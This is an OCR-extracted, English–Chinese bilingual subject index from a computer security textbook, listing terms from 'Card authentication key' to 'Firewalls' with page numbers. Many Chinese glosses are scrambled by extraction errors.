Card authentication key (CAK， 卡 认证 密 钥 )，551 
Cardholder unique identifier ( CHUID ， 持 卡 人 唯一 
识别 码 )，548，551 
Cardinality, RBAC roles (RBAC 角色 基数 )，132-133 
Cascaded access right (级 联 访问 权限 )，171 
Cascading authorizations (级 联 授权 )，170-171 
CD-ROM (光驱 )，588 
Centralized administration (集中 管理 ， 中 央 管 理 )，169 
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CERT, J Computer Emergency Response Team 
CERT 2007 E-crime Survey ( CERT 2007 电子 犯罪 
调查 )，612，614 
Certificate authority (CA， 认 证 中 心 )，61，317， 
425, 550, 722, 726 
Certificate revocation list(CRL， 证 书 撤销 列表 )，724 
Certificates (证 书 ) 
attribute (属性 )，724 
conventional (long-lived)( 习 惯 ， 长 期 的 习俗 )，723 
proxy (代理 )，724 
public-key (448), 61-62 
short-lived (短期 )，724 
X.509, 62 
Certification (AVE), 26 
cross (ZX), 727 
rules (ALM), 452 
service (ARS), 467 
Certifier (证 明 者 )，480 
Challenge-response protocol (挑战 -应 答 协 议 )， 
101-102, 04-105, 110 
Change Cipher Spec Protocol (变更 密码 标准 协议 )， 
701，703 
Change management (变更 管理 )，517-528 
Channel (信道 ， 通 道 )，33-34，472，478-479，590， 
619，652，732，750-751 
Charge-coupled device (CCD ， 电 荷 耦 合 装置 )，65 
Chernobyl virus 〈 切 尔 诺 贝 利 病毒 )，221 
Chinese wall model (中 国 墙 模型 )，454-456 
Choreographic works, copyrighted (舞蹈 作品 ， 版 
权 )，616 
Chroot jail (Chroot 监牢 )，402，416，429-430 
Chroot system (Chroot 系统 )，429 
chroot system function (chroot 系统 函数 )，402 
CHUID digital signature ( CHUID 数字 签名 )， 
549-550 
CIA triad (CIA 44), 13 
Cipher block chaining (CBC) mode (密码 分 组 链接 
模式 ， 密 文 块 链接 模式 )，656-657，671 
Cipher block feedback (CFB) mode (密码 分 组 反馈 
模式 ， 密 文 块 反馈 模式 )，657-659 
Cipher suite (密码 套件 )，750 
Ciphertext (ŒX), 42, 56, 638, 640 
public-key encryption ( 公 钥 加 密 )，56 
symmetric encryption (对 称 加 密 )，42 


Ciphertext-only attack (EÈ XAH), 639-640 
Circuit-level gateway/circuit-level proxy (电路 级 网 
ZK /电路 级 代理 )，313-314 
CIRT (计算 机 突 发 事件 响应 小 组 )， 参 见 Computer 
incident response team 
Claimant (原告 )，75 
Clark-Wilson model (CWM) of computer security (i+ 
算 机 安全 的 Clark-Wilson HH), 452-453 
Class (类 )，117，126-127，134，269，364，368，382， 
387, 441, 454, 459, 471-473, 519, 624-625 
Classic cross-site scripting (XSS) attack (经 典 的 跨 站 
脚本 攻击 )，409-410 
Classification creep (4}28/(@ 47), 448 
Clearinghouse (票据 交换 所 )，620 
Clear signed data, S/MIME (明确 的 签署 数据 )，696 
Click jacking (点 击 支 持 )，218 
Client (客户 端 )，178 
Client attacks (客户 端 攻击 )，103-104 
Cloud auditor ( 云 审计 者 )，185-187 
Cloud broker ( 云 经 纪 人 )，185-186 
Cloud carrier ( 云 运营 商 )，185-186 
Cloud computing ( 云 计 算 )，180-187 
abuse and nefarious use of (混用 和 不 法 使 用 )，187 
basic APIs, security of (基本 API， 安 全 )，187 
broad network access (广域网 访问 )，181 
cloud security as a service ( 云 安 全 作为 服务 )， 
189-193 
community cloud (社区 云 )，184 
computing context (计算 环境 )，184 
data protection in (数据 保护 )，189 
elements (GX, BR), 181 
essential characteristics (基本 特征 、 主 要 特征 )，181 
hybrid cloud (混合 云 )，184 
infrastructure as a service ( IaaS， 基 础 设施 即 服 
务 )，183 
measured service (计量 服务 )，182 
NIST definition (NIST 定义 )，181，189 
on-demand self-service ( 按 需 自 服务 )，182 
platform as a service (PaaS， 平 台 即 服务 )，182-183 
private cloud (WAZ), 184 — 
public cloud (公有 云 )，183 
rapid elasticity (快速 灵活 性 ， 快 速 弹性 )，182 
reference architecture (引用 架构 )，185-187 
resource pooling (资源 池 )，182 


security risks and countermeasures (安全 风险 和 对 
策 )，187-188 
software as a service (SaaS ， 软 件 即 服务 )，182 
Cloud consumers ( 云 消费 者 )，185 
Cloud provider (CP， 云 提供 商 )，185 
Cloud Security Alliance ( 云 安全 联盟 )，187，190 
Cloud service provider (CSP， 云 服务 提供 商 )，190 
Clustering and outlier detection ( 聚 类 和 蜡 类 检测 )，277 
Code analysis techniques (代码 分 析 技术 )，168 
Code injection attack (代码 注入 攻击 )，385-386，401 
Code of Practice for Information Security Management 
(ISO 27002) (信息 安全 管理 实施 细则 )，583 ， 
623-624 
Code Red II (红色 代码 I)，214-215 
Codes of conduct (行为 准则 )，629-632 
Code, writing safe programs using (准则 ， 编 写 安 
PEF), 392-396 
Collision resistance (thd), 49n3, 53-54 
Collision resistant hash functions ( 抗 碰撞 散 列 函 
数 )，53 
Combined approach, security risk assessment (组 合 
方法 ， 安 全 风险 评估 )，495 
Command-and-control ( C&C ) server network (命令 
和 控制 服务 器 网 络 )，224 
Command injection attack (命令 注入 攻击 )，384，410 
Commercial Product Evaluation Program (商业 产品 
评估 程序 )，458 
Common controls (常见 的 控制 )，520 
Common Criteria( CC， 通 用 标准 )，470-476，478， 
480-481, 580, 582, 602, 624-625 
assurance level (保险 等 级 )，394，478-479 
for information technology security evaluation ( 信 
息 技 术 安全 评估 )，470-476 
security assurance requirements (安全 保险 需求 )，473 
security functional requirements (安全 功能 需求 )，472 
Common Criteria Evaluation and Validation Scheme 
(CCEVES， 通 用 准则 评价 和 验证 方案 )，480 
Communication lines，computer security and (通信 
线路 ,计算 机 安全 )，22 
Communications channel (CC， 通 信 通 道 )，33 
Communications facilities and networks (通信 设施 和 
网 络 )，18 
Community cloud (社区 云 )，184 
Comm Warrior worm (Comm Warrior 蠕虫 )，217 
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Companion key (伴随 密 钥 )，56 
Companion Web site (配套 Web 站 点 )，8 
Company policy (公司 策略 )，567 
Company rights (公司 权利 )，567 
Compile-time defenses (编译 时 防御 )，359-363 
Complete mediation (完全 仲裁 )，28，458 
Complex password policy (复杂 口令 策略 )，88 
Component (组 件 )，471 
Compression (压缩 )，702 
Compression function〈 压 缩 函数 )，678 
Compromise (妥协 )，79，412，511 
Computationally secure (计算 安全 )，640 
Computer crime (计算 机 犯罪 )， 参 见 Cybercrime 
Compnuter Emergency Response Team ( CERT， 计 算 
机 应 急 响应 小 组 )，32，337，572 
Computer-generated passwords (计算 机 生成 的 口令 )，88 
Computer incident response team ( CIRT， 计 算 机 突 
发 事件 响应 小 组 )，569 
Computers (计算 机 ) 
as communications tools (作为 通信 工具 )，612 
as storage devices (作为 存储 设备 )，612 
as targets〈 作 为 目标 )，611 
Compnuter security (计算 机 安全 ) 
availability (有 效 性 )，15-16 
breach of levels (违背 的 层次 )，14 
categories of vulnerabilities (漏洞 分 类 )，18 
challenges of (挑战 )，16-17 
confidentiality (机 密 性 )，15 
consumers of services and mechanisms (RAL 
制 消费 者 )，36 
cost of security failure (安全 失效 的 代价 )，35 
criteria for evaluation of (评估 标准 )，470-476 
definition (ŒX), 12-16 
ease of use vs. security (〈 易 用 性 与 安全 )，35 
functional requirements (功能 需求 )，25-27 
fundamental security design principles (基本 安全 
设计 原则 )，27-31 
high level (高 层次 )，14 
implementation of (实现 )，35-36 
integrity (完整 性 )，15 
key objectives (关键 目标 )，13 
low level (低层 次 )，14 
model for (模型 )，17-19 
moderate level (中 等 层次 )，14 
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policy (策略 )，34-35 
privacy and (隐私 )，13，15，23，143-144，146， 
187-188, 566, 611, 619, 621-626 
scope of (4%), 22 
strategy (R), 34-36 
system resources (assets) ASC VM), 18, 21-23 
terminology (术语 )，17 
threats to (威胁 )，19-25 
Computer security incident response team ( CSIRT, 
计算 机 安全 事件 响应 团队 )，567-574 
detecting incidents (检测 事件 )，569-570 
documenting incidents (归档 记 录 事 件 )，573 
information flow for incident handling (事件 处 理 
信息 流 )，573-574 
responding to incidents (响应 事件 )，571-572 
tool for (工具 )，570 
triage function (分 类 功能 ， 分 流 功 能 )，570-571 
Computer security models (计算 机 安全 模型 ) 
Bell-LaPadula model (Bell-LaPadula 模型 )，440-450 
Biba integrity (Biba 完整 性 )，451-452 
Chinese Wall Modes (CWM， 中 国 墙 模型 )，454-456 
Clark-Wilson model ( CWM, Clark-Wilson 模型 )， 
452-453 
multilevel security (多 层 安 全 )，442，459-466 
Computing artifact (计算 机 产品 )，632 
Conficker ( or Downadup ) worm ( Conficker ( 或 
Downadup) 蠕虫 )，215 
Confidence (机密)，548 
Confidentiality (机 密 性 )，15，23，109，702，758 
computer security and (计算 机 安全 )，13，15，23 
data (数据 )，13 
Family Education Rights and Privacy Act (FERPA, 
家 庭 教 育 权利 及 隐私 法 )，15 
message or data authentication without (消息 或 数 
据 认 证 )，48-49 
public-key encryption ( 公 钥 加 密 )，56-57 
secure system (安全 系统 )，444 
symmetric encryption and (对 称 加 密 )，41-47 
threat to (威胁 )，19 
Configuration management (配置 管理 )，22，25-26，28， 
306, 473, 478, 515, 519, 521-522, 526-529, 600 
Connection (#24), 701 
Consequence (44), 19-21, 23, 55, 242, 245, 
249, 257, 262, 264-265, 337, 338, 351, 


354, 373, 377, 379, 382, 385, 389-390, 
392, 395-396, 400-402, 410, 424, 426, 
433-434, 486, 490, 494, 499-501, 503-505, 
507, 509-514, 523, 528, 537-538, 561, 
563, 567, 630-631, 647-648 

Constant exponentiation time (不 变 的 寡 运 算 时 间 )， 
684 

Constituency (选民 ， 顾 客 )，569 

Constrained data items CDIs (约束 数据 项 )，452 

Consumers (消费 者 )，476，619，620 

Content ownership (内 容 拥 有 者 )，566 

Content provider (内 容 提供 者 )，619 

Content-Type HTTP response header (内 容 类 型 
HTTP 响应 头 )，411 

Contingency planning (意外 事故 规划 )，26 

Continuum of learning programs (持续 学 习 程 序 )， 
558-559 

Contractual obligations (32245 X45), 558 

Control ($ fill), 13, 27, 48, 75, 84, 94, 106, 
158, 166, 182-184, 187, 189, 192, 206- 
207, 222, 224, 232-233, 242, 250-251, 273, 
320, 337, 341-343, 346-347, 352, 356, 
358, 363-368, 370, 388-389, 393, 396, 
398, 402, 404, 406, 410-411, 418, 423, 
425-426, 441, 492, 497-498, 507-508, 510, 
516-524, 536, 544, 611, 661, 697, 733, 
736-737, 741-742, 756, JL Access control 

Conventional (long-lived) certificates (传统 (长 效 ) 
证 书 )，723 

Cookies，166 

Cooperating conspirator problem ( 共 谋 问题 )，450 

Copying of biometric parameter (生物 特征 参数 拷 
贝 )，105 

Copyright law (版 权 法 )，616 

Copyrights，intellectual property and (版 权 ， 知 识 产 
权 )，615 

Corporate policies (公司 政策 )，623 

Corporate security (公司 安全 )，316，490 

Correlation (关联 )，604 

Corrupted system【〈 受 损坏 的 系统 ， 腐 败 系统 )，18 

Corruption (损坏 ， 腐 败 )，20-21，38，189，200， 
202, 221-222, 338, 340-341, 360, 372, 
395, 401, 426, 509, 514 

Cost of security failure (安全 失效 的 代价 )，35 








Countermeasures (对 策 )，18，19，516-524 
attack strategies and (攻击 策略 )，79-80 
buffer overflow (缓冲 区 溢出 )，359-365 
for cloud computing risks ( 云 计算 风险 )，187-188 
compile-time defenses (编译 时 防御 )，359-363 
denial-of-service (DoS) attack (拒绝 服务 攻击 )， 
259-263 
distributed intelligence gathering (分 布 式 情 报 搜 
集 )，235 
fooding attacks ( 洪 泛 攻击 )，261 
generic decryption (通常 的 解密 )，232-233 
heap overflows ( 堆 溢 出 )，368 
host-based behavior-blocking software (基于 主机 
的 行为 阻止 软件 )，233 
host-based scanners (基于 主机 的 扫描 器 )， 
231-234 
for malware (恶意 代 码 )，229-235 
perimeter scanning (边界 扫描 )，234-235 
rootkit, 234 
run-time defenses (运行 时 防御 )，363-365 
safe coding techniques (安全 编码 技术 )，360-362 
safe libraries (安全 库 )，362 
spyware detection and removal (间谍 软件 检测 和 
移 除 )，243 
of SQLi attacks (SQLi 攻击 )，168 
stack protection mechanisms (堆栈 保护 机 制 )， 
362-363 
Trojan horse defense (木马 防御 )，458-459 
Counter (CTR) mode (计数 器 模式 )，659-660 
Counter Mode-CBC MAC Protocol ( CCMP ， 计 数 器 
模式 CBC MAC 协议 )，750，758-759 
Covert channel analysis (隐蔽 通道 分 析 )，478，479 
C programming language (C 编程 语言 )，342 
CPU emulator (CPU 仿真 器 )，232 
Credential management (证 书 管理 )，141-142 
Credentials (证 书 )，74 
Credential service provider ( CSP) (证 书 服 务 提供 
者 )，74 
Credential theft (证 书 窃取 )，224-225 
Crimeware (犯罪 软件 )，202，225 
CRL issuer (CRL 发 行人 )，727 
Cross certification (交叉 证 明 )，727 
Cross-site scripting attacks (XXS) ( 跨 站 脚本 攻击 )， 
387-388 
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”Cryptanalysis (RE), 42-43, 45, 54-55, 639-641 


Cryptanalytic attacks (密码 分 析 攻击 )，80 
Cryptographic co-processor (密码 学 协同 处 理 器 )，468 
Cryptographic message authentication code (加 密 消 
息 认 证 码 )，118 
Cryptographic tools (密码 学 工具 ) 
asymmetric encryption algorithms ( 非 对 称 加 密 算 
法 )，59-60 
confidentiality (机 密 性 )，41-47 
digital envelopes (数字 信封 )，63-64 
digital signatures (数字 签名 )，60-63 
encryption of stored data (存储 数据 加 密 )，66-67 
hash functions (#51) PAIX), 50-55 
key management (WHAE), 48-50 
message authentication (消息 认证 )，48-50 
Pretty Good Privacy (PGP， 良 好 隐私 )，66-67 
pseudorandom numbers ( 伪 随 机 数 )，64-66 
public-key encryption ( 公 钥 加 密 )，55-63 
random number (随机 数 )，65-66 
symmetric encryption (对 称 加 密 )，41-43 
Cryptography (密码 学 )， 参 见 Public-key encryption/ 
cryptosystem;Symmetric encryption 
CS2013，6-8 
CSI/FBI Computer Crime and Security Survey ( CSL/ 
FBI 计算 机 犯罪 和 安全 调查 )，500 
CWE/SANS Top 25 Most Dangerous Software 
Errors list (CWE/SANS 25 个 最 危险 的 软件 错 
误 列 表 )，377 
Cybercrime (网 络 犯罪 )，611-612 
cited in the convention on cybercrime (网 络 犯罪 大 
会 引用 的 )，613 
law enforcement challenges (法 律 执行 挑战 )， 
612-614 
Types (2889), 611-612 
Cybercrime victims (网 络 犯罪 受害 者 )，614 
Cyber criminals (网 络 罪 犯 )，268-269，613 
Cyber-espionage worm (网 络 间 谍 蠕 虫 )，216 
Cyberslam, DoS (Cyberslam 攻击 )，243 
D 
3DES (三 重 数据 加 密 标准 )， 参 见 Triple DES 
DAC (自主 访问 控制 )， 参 见 Discretionary access 
control 
Data (数据 )，18，23 
backup (#4), 426 
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clear-signed (透明 签名 的 )，696 
confidentiality (机 密 性 )，13，38，611，755，758 
correct interpretation of (正确 的 解释 )，394-395 
defined (已 定义 的 )，13nl 
destruction ( 析 构 )，221-222 
enveloped (封装 )，694，697 
generation (FÆ), 580-581 
integrity (7 # HE), 13, 21, 23, 36, 38, 47, 
54, 57-58, 61, 109, 281, 465, 536, 611, 
634, 670-671 
leakage or loss (泄漏 或 丢失 )，188 
owner (拥有 者 )，177 
personal (个 人 的 )，93 
sanitized (消毒 ， 清 洗 )，456 
signed (签名 的 )，694 
signed and clear-signed (签名 的 和 透明 署名 的 )， 
696-697 
signed and enveloped (签名 的 和 封装 的 )，696 
source ( 源 )，293 
surveillance and privacy (监督 和 隐私 )，625-626 
swapping (交换 )，653-654 
transformation (变换 )，626 
values, writing correct code for ( 值 ， 写 纠 错 码 )， 
394-396 
Data definition language (DDL， 数 据 定义 语言 )， 
158, 173 
Data Encryption Algorithm ( DEA， 数 据 加 密 算法 )， 
43，643 
Data Encryption Standard (DES， 数 据 加 密 标准 )， 
41, 643, 717 
algorithm (算法 )，82 
Data exfiltration (数据 渗 出 )，226 
Data loss prevention (DLP， 数 据 丢 失 预 防 )，190 
Data manipulation language (DML， 数 据 操作 语 
言 )，158 
Data protection in cloud computing ( 云 计 算 中 的 数据 
保护 )，189 
multi-instance model (多 实例 模型 )，189 
multi-tenant model (多 租户 模型 )，189 
Database access control (数据 库 访 问 控制 )，169-173 
cascading authorizations (级 联 认证 )，170-171 
fixed database roles (固定 的 数据 库 角色 )，172 
fixed server roles (固定 的 服务 器 角色 )，172 
range of administrative policies (管理 策略 范围 )，169 


role-based (基于 角色 的 )，171-173 
SQL-based (基于 SQL 的 )，169-170 
user-defined roles〈 用 户 定义 的 角色 )，172-173 
Database encryption (数据 库 加 密 )，176-180 
disadvantages to (劣势 )，176 
entities (实体 )，177-178 
example (示例)，180 
Database management system (DBMS, ， 数 据 库 管理 
系统 )，157-159，177，464-465 
architecture (4844), 158 
Database RBAC facility (数据 库 RBAC 设施 )，172 
Databases ( #8 FE), 157, 618, 4 JL Database 
access control 
encryption (加 密 )，176-180 
inference and (推理 )，173-176 
multilevel security (MLS) of (多 层 安全 )，461-466 
query language (查询 语言 )，157-158 
relational (相关 的 )，159-163 
security kernel (安全 内 核 )，457-458 
security，need for (安全 性 ， 需 要 )，156-157 
statistical (统计 的 )，618 
storage for logs (日志 存储 )，592 
Day-to-day interfaces (日 常 的 接口 )，29 
Deadlock, prevention of ( 死 锁 ， 预 防 )，396 
Deallocator (释放 器 )，370 
Decentralized administration (分散 化 管理 )，169 
Deception (欺骗 )，21 
Decryption (解密 )，44，46-47，50，56，59 
Decryption algorithm (f 密 算 法 )，42，56-57， 
638, 645, 647, 657, 660, 681, 684, 729 
public-key encryption ( 公 钥 加 密 )，56 
symmetric encryption (对称 加 密 )，42 
Defense in depth (深度 防御 )，30 
Defensive coding (防御 式 编程 )，168 
Defensive programming ( 防 $ A a Æ), 7, 376- 
380, ÆJ Programming projects 
Deletion, access to 〈 删 除 ， 访 问 )，117 
Denial-of-service (DoS ， 拒 绝 服务 )，24，734 
Denial-of-service (DoS) attack (拒绝 服务 攻击 )， 
31, 105, 164, 288 
amplification (HK), 251, 255, 257-259 
classic (经典 的 )，244 
countermeasures (对 策 )，252，259-263 
distributed (分 布 式 )，8，223，250-252 


flooding ( 洪 泛 )，248-250 
nature (自然 )，241-244 
reflection (反射 )，255-257 
responding to (响应 )，263-264 
smurf DoS program (Smurf DoS 程序 )，258 
source address spoofing ( 源 地 址 欺骗 )，244-246 
SQLi attack and (SQLi 攻击 )，164 
SYN spoofing attack (SYN 欺骗 攻击 )，246-248 
Tribe Flood Network (TFN ， 部 落 洪 泛 网 络 )，251 
Design patents〈 设 计 专利 )，617 
Design specification and verification (设计 规格 和 确 
认 )，478 
Destination IP address (目的 IP 地 址 )，309 
Destructor functions 〈 析 构 函 数 )，370 
Detailed security risk analysis (详细 安全 风险 分 析 )， 
494-495 
analysis of risks (风险 分 析 )，501-505 
context or system characterization (环境 或 系统 特 
征 )，497-499 
evaluation of risks (风险 评估 )，505 
identification of threats/risks/vulnerabilities (威胁 / 
风险 /漏洞 识别 )，499-501 
risk (treatment)( 风 险 )，506-507 
Silver Star Mines, risk assessment process ( 银 星 
矿业 风险 评估 过 程 )，507-512，528-531 
Detecting an attack (检测 攻击 )，19 
Detection (检测 )，35-36 
and recovery control (恢复 控制 )，518 
Detection methods (检测 方法 )，168 
Deterrence (威慑 )，500 
Developers (开发 者 )，476，480，562 
Diffie-Hellman key exchange/key agreement ( Diffie- 
Hellman WHH), 59, 63, 684-688 
Digital content (AHA), 618 
Digital envelopes (数字 信封 )，63-64 
Digital identity (数字 识别 )，141 
Digital immune system (数字 免疫 系统 )，324-326 
Digital Millennium Copyright Act (DMCA, FF 
年 版 权 法 案 )，618-619 
Digital Rights Management (DRM ， 数 字 权 利 管理 )， 
619-621 
architecture (4244), 621 
billing/payments functions (账单 / 支付 函数 )，621 
components (组 件 )，620 
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Digital Signature Algorithm (DSA， 数 字 签名 算 
法 )，59 
Digital signatures (数字 签名 )，60-64 
Digital Signature Standard ( DSS， 数字 签名 标准 )， 
59, 688, 696 
Directed broadcast (Hi) #%), 258, 262-264 
Directory information (目录 信息 )，15 
Directory traversal (目录 遍历 )，323 
Disciplinary action (纪律 处 分 )，567 
Disclosure (揭露 )，7，13，19-21，23，30，38-39，76， 
174, 188, 451, 510, 521, 564, 567, 631, 635 
Discretionary access control (DAC， 自 主 访 问 控制 )， 
116，118-124 
access matrix controller (访问 矩阵 控制 器 )，121 
access rights of subjects (主体 访问 权限 )，121 
of devices (设备 )，120 
general model for (通用 模型 )，120-123 
logical or functional point of view (逻辑 或 功能 观 
察 点 )，121 
of memory locations or regions (内 存 位 置 或 区 
域 )，120 
of processes (处 理 )，120 
protection domains (保护 域 )，123-124 
rules for transferring, granting, and deleting 
access rights ( 转 授 、 授 权 和 删除 访问 权限 的 
规则 )，121-123 
display() function (display() 函数 )，349 
Dispute resolvers (争端 调节 者 )，146 
Disruption ( 破 坏 )，20-21，24-25，31，38，191， 
203, 211, 241, 538, 568, 614, 734, 745 
Distributed denial-of-service (DDoS) attacks (分 布 
式 拒绝 服务 攻击 )，8，223 250-252 
Distributed detection and inference (DDI) events (分 
布 式 检测 和 推断 事件 )，290-291 
Distributed firewalls (分 布 式 防火 墙 )，320，322 
Distributed host-based intrusion detection (分 布 式 基 
于 主机 的 人 侵 检测 )，268 
Distributed intrusion prevention system (IPS, 分布 
KARP HAR), 235, 281-283 
architecture for (2244), 282 
central manager module (中 央 管 理 模块 )，282 
host agent module (主机 代理 模块 )，282 
LAN monitor agent module (局 域 网 监控 代理 模 
块 )，282 
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major issues in the design of (设计 中 的 主要 问题 )， 
281-282 

Distributed or hybrid IDS (分 布 式 或 混合 式 IDS)， 
273，289-291 

Distribution right (分 发 权限 )，616 

Distribution system ( DS， 分 布 式 系统 )，546，740， 
742-744，747 

Distributor (发 行人 ， 分 配 者 )，619 

DMZ (demilitarized zone)( 非 军事 区 )，295 

networks (网 络 )，317-319 

DNS amplification attacks (DNS 放大 攻击 )，258-259 

Document number (文档 编号 )，93 

Domain Keys Identified Mail ( DKIM， 域 名 密 钥 识 
别 邮件 )，697-700 

Domain name system (DNS， 域 名 系统 )，287，699 

Dormant phase of virus (病毒 休眠 期 )，205 

DoS (拒绝 服务 )， 参 见 Denial-of-service (DoS) 

Double bastion T (HT), 322 

Downloaders (下 载 者 )，201 

Dramatic works, copyrighted (戏剧 作品 ， 有 版 权 
的 )，616 

Drive-by-download attack (夹带 式 下 载 攻击 )，201， 
203，217-218 

Drone，222 

Drop (下 降 )，326 

Ds-property (Ds- 特性 )，442，444 

Duqu worm (Duqu 蠕虫 )，216 

Dust (灰尘 )，542 

Dynamically linked shared libraries (动态 链接 共享 
库 )，596-597 

Dynamic binary rewriting (动态 二 进 制 重 写 )，598-600 

Dynamic biometric authentication (动态 生物 特征 认 
证 )，96-101 

Dynamic biometric protocol (动态 生物 特征 协议 )，103 

Dynamic Host Configuration Protocol ( DHCP， 动态 
主机 配置 协议 )，287 

Dynamic Link Libraries (DLL， 动 态 链接 库 )，279 

E 

EAP exchange (EAP 交换 )，752-753 

EAPOL Key Encryption Key ( EAPOL-KEK，EAPOL 
密 钥 加 密 密 钥 )，756 

EAP Over LAN ( EAPOL ) Key Confirmation Key 
(EAPOL-KCK， 基 于 局 域 网 的 扩展 认证 协议 
(EAPOL) 密 钥 认证 密 钥 )，756 


Earthquake (地 震 )，537 
Eavesdropping (#4), 104-105, 543 
Economy of mechanism (经 济 机 制 )，28 
Egress monitors (出 口 监控 )，235 
Electrically erasable programmable ROM (EEPROM, 
电 可 擦 除 编程 ROM)，92 
Electrical power threat (电力 的 威胁 )，542 
Electromagnetic interference ( EMI) threat (电磁 干 
扰 威 胁 )，543 
Electronic codebook (ECB) mode (电子 密码 本 模式 )， 
45, 48, 655-656 
Electronic identity (eID) card (电子 身份 证 )，93-96 
functions (THRE, PARK), 94-96 
human-readable data on (人 类 可 读 的 数据 )，93 
Password Authenticated Connection Establishment 
(PACE, 口令 认证 连接 建立 )，96 
Electronic monitoring (电子 监控 )，80 
Electronic user authentication (电子 用 户 认证 ) 
means of (方法 )，75 
model for (模型 )，74-75 
Risk assessment (风险 评估 )，75-78 
Elliptic curve cryptography ( ECC， 椭 圆 曲线 密码 
学 )，60，688-689 
E-mail (电子 邮件 ) 
attachment, infected (附件 ， 感 染 )，214，219 
clear signed data, S/MIME (清晰 署名 的 数据 )， 
696-697 
DomainKeys Identified Mail (DKIM， 域 名 密 钥 识 
别 邮 件 )，697-700 
enveloped data，S/MIME (信封 封装 数据 )，694， 
697 i 
and Internet access policies (互联 网 ( Internet) 访 
问 策略 )，566-567 
Multipurpose Internet Mail Extension (MIME, 多 
用 途 互 联网 邮件 扩展 )，694 
public-key certificates ( 公 钥 证 书 )，697 
Secure/Multipurpose Internet Mail Extension ( S/ 
MIME， 安 全 /多 用 途 互联 网 邮件 扩展 )， 
62, 694-697, 699-700, 707, 722 
security (安全 性 )，192 
signed data, S/MIME (清晰 署名 的 数据 )，694， 
696-697 
spam (垃圾 邮件 )，219 
Trojan horses (木马 )，219-220 


Employee behavior (雇员 行为 )) 557 
Employment agreements (雇用 者 协议 )，564 
Employment practices and policies (雇用 者 实践 和 策 
W), 563-565 
Emulation control module (仿真 控制 模块 )，232 
Encapsulating Security Payload ( ESP， 封 装 安全 载 
荷 )，710-712 
transport mode (传输 模式 )，711 
tunnel mode (隧道 模式 )，711-712 
Encapsulation (封装 )，30 
Encrypted MAC (加 密 MAC)，702 
Encrypted virus (加密 的 病毒 )，208 
Encrypting File System (EFS， 加 密 文件 系统 )，432 
Encryption 加密)，734 
end-to-end〔( 端 到 端 )，660-663 
research (研究 )，618 
service (服务)，193-467-468 
of stored data，application of (存储 的 数据 ， 应 用 
程序 )，66-67 
Encryption algorithm (加 密 算法 )，638 
public-key encryption ( 公 钥 加 密 )，56 
symmetric encryption (对称 加 密 )，42 
End entity (终端 实体 )，726 
End-of line comment ( 行 尾 注释 )，167 
End-to-end encryption ( 端 到 端 加 密 )，660-663 
End user (终端 用 户 )，172 
Enforcement rules (执行 规则 )，452 
Enroll (注册 )，97-98，106 
Enrolled in the system (在 系统 中 注册 )，97 
Enterprise identity (企业 级 一 致 性 )，141 
Enterprise-wide access control (企业 级 访问 控制 )，142 
Enveloped data, S/MIME (封装 数据 )，694，696-697 
Environmental threats (环境 威胁 )，539-542 
dust (灰尘 )，542 
fire and smoke ( 火 和 烟 )，540-541 
inappropriate temperature and humidity (不 合适 的 
温度 和 湿度 )，539-540 
infestation( 侵 染 ， 感 染 )，542 
prevention and mitigation measures (预防 和 阻止 
措施 )，544-545 
Environmental variables ,software security( 环境 变量 ， 
软件 安全 )，397-400 
Environment attributes (环境 属性 )，134 
ePass function (ePass 函数 )，94 
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Error-detection code (错误 识别 码 )，48 
eSign function (eSign 函数 )，94 
ESP information (ESP 信息 )，710 
Espionage (间谍 )，226 
/etc/syslog, conf, 592 
Ethics (伦理 ) 
code of conduct( 行 为 准则 )，629-632 
IEEE Code of Ethics (IEEE 伦理 准则 )，631 
IS professions and (IS 行业 )，627-628 
issues related to computers and information systems 
(有 关 计 算 机 和 信息 系统 的 议题 )，628-629 
rules (规则 )，632 
European Union Data Protection Directive (欧盟 数据 
保护 指令 )，622 
Evaluation ( 评 fi ), 36, 45, 456, 458, 470-476, 
478-481, 492, 495, 502, 516, 562 
Evaluation assurance levels ( EAL， 评 估 保 险 级 别 )， 
478-479 
Evaluations (评估 )，477，480 
Event ($F), 293 
Event and audit trail analysis software, tools, and 
interfaces (事件 和 审计 迹 分 析 软 件 、 工 具 和 接 
O), 583 
Event definition (事件 定义 )，581 
Event detection (事件 检测 )，583 
Event discriminator (事件 鉴别 )，579 
Event recording (事件 记录 )，583 
Event response (事件 响应 )，592 
Event selection (事件 选择 )，581 
Event storage (事件 存储 )，581 
Executable address space protection (可 执行 地 址 空 
间 保 护 )，363-364 
Execute (执行 )，451 
Execute access (执行 访问 )，117 
Execution engine (执行 引擎 )，469 
Execution phase of virus (病毒 执行 期 )，205 
viral structure 病毒 结构 )，206-208 
Executive-level training (执行 层 训 练 )，562 
execve() system function (execve0 系统 函数 )，352 
Exploits (漏洞 利用 )，201 
Exposure (暴露 )，19，425，493，497，501，527， 
539, 614, 626 
Extended service set (ESS， 扩 展 服务 集 )，740，743 
Extensible Markup Language ( XML， 可 扩展 标记 语 
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B), 292 
Extreme Learning Machines (ELM， 极 限 学 习 机 )， 
279 
F 
Facilities security (设备 安全 ,设施 安全 )，535 
Factoring problem for RSA algorithms ( RSA 算法 因 
数 分 解 问题 )，682-683 
Fail-safe default (安全 缺 省 设置 )，28 
Fair use (公平 使 用 )，618 
False negatives ( 漏 报 )，273 ，276 
False positives (iR4%), 273, 276 
Falsification (伪造 )，20-21 
Family Educational Rights and Privacy Act ( FERPA, 
家 庭 教 育 权 利和 隐私 法 案 )，15 
Family, IT security requirements (家 庭 ，IT 安 全 
需求 )，471 
Fault insertion (故障 插 人 )，475 
Federal Information Processing Standards (FIPS， 联 
邦 信息 处 理 标准 )，9，13-14，25，27，43，45， 
50, 54, 59, 76, 87, 548-551, 643-645, 658, 
672, 688 
PUB46, 43 
PUB180, 54 
PUB186, 59 
PUB197 standard, 45 
PUB199 standard, 13-14 
PUB200 ( Minimum Security Requirements for 
Federal Information and Information Systems (EK 
邦 信息 和 信息 系统 的 最 小 安全 要 求 ) )，25，27 
Federated identity standards and protocols (联邦 身份 
标准 和 协议 )，140，143 ，190 
Feistel cipher structure (Feistel 密码 结构 )，641-643 
fgets() library routine (fgets) 库 例 程 )，349 
File access control (文件 访问 控制 )，86，124-127 
File access system (文件 访问 系统 )，323 
File infector (文件 传染 者 )，208 
File integrity checksums (文件 完整 性 校 验 和 )，279 
Finger (手指 )，287 
fingerd daemon (指示 服务 守护 进程 )，342 
联邦 信息 处 理 标准 (FIPS), ÆJ Federal Information 
Processing Standards 
Firewall projects (防火 墙 项 目 )，767-768 
Firewalls (BH K #7), 4 J Intrusion prevention 
systems 


activity patterns, access based on〈 活 动 模式 ， 访 
问 基于 )，307 

application-level gateway (应 用 层 网 关 )，312-313 

